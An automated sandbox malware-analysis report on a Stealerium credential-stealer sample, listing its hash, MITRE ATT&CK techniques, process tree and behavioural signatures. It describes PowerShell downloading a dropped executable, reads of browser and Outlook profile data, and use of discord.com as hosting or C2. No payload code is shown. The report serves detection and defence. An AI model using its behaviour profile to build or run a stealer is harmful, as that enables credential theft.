Malware Analysis Report

2024-08-06 12:53

Sample ID 240615-jeyccasdra
Target message (4).txt
SHA256 938a55f060e9cf90c9a0aa9206f75ba032cc445e52415334982ccd70ad4e049a
Tags
stealerium collection execution spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

938a55f060e9cf90c9a0aa9206f75ba032cc445e52415334982ccd70ad4e049a

Threat Level: Known bad

The file message (4).txt was found to be: Known bad.

Malicious Activity Summary

stealerium collection execution spyware stealer

Stealerium

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Executes dropped EXE

Reads user/profile data of web browsers

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

Kills process with taskkill

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

outlook_win_path

outlook_office_path

Delays execution with timeout.exe

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Enumerates system info in registry

Modifies registry class

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Persistence
TA0003
Privilege Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Email Collection
T1114
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-15 07:35

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-15 07:35

Reported

2024-06-15 07:37

Platform

win11-20240611-en

Max time kernel

109s

Max time network

104s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\message (4).txt"

Signatures

Stealerium

stealer stealerium

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\hueta.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\hueta.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\hueta.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\hueta.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A icanhazip.com N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\hueta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\hueta.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133629105746329478" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A
N/A N/A C:\Users\Admin\hueta.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1576 wrote to memory of 4916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\NOTEPAD.EXE
PID 1576 wrote to memory of 4916 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\NOTEPAD.EXE
PID 2444 wrote to memory of 1464 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1464 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 340 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 4488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 4488 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2444 wrote to memory of 1808 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\hueta.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-952492217-3293592999-1071733403-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\hueta.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\message (4).txt"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\message (4).txt

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff89233ab58,0x7ff89233ab68,0x7ff89233ab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1544 --field-trial-handle=1836,i,8065625511859414642,18076420440458594363,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1836,i,8065625511859414642,18076420440458594363,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2228 --field-trial-handle=1836,i,8065625511859414642,18076420440458594363,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3044 --field-trial-handle=1836,i,8065625511859414642,18076420440458594363,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3204 --field-trial-handle=1836,i,8065625511859414642,18076420440458594363,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4228 --field-trial-handle=1836,i,8065625511859414642,18076420440458594363,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4412 --field-trial-handle=1836,i,8065625511859414642,18076420440458594363,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

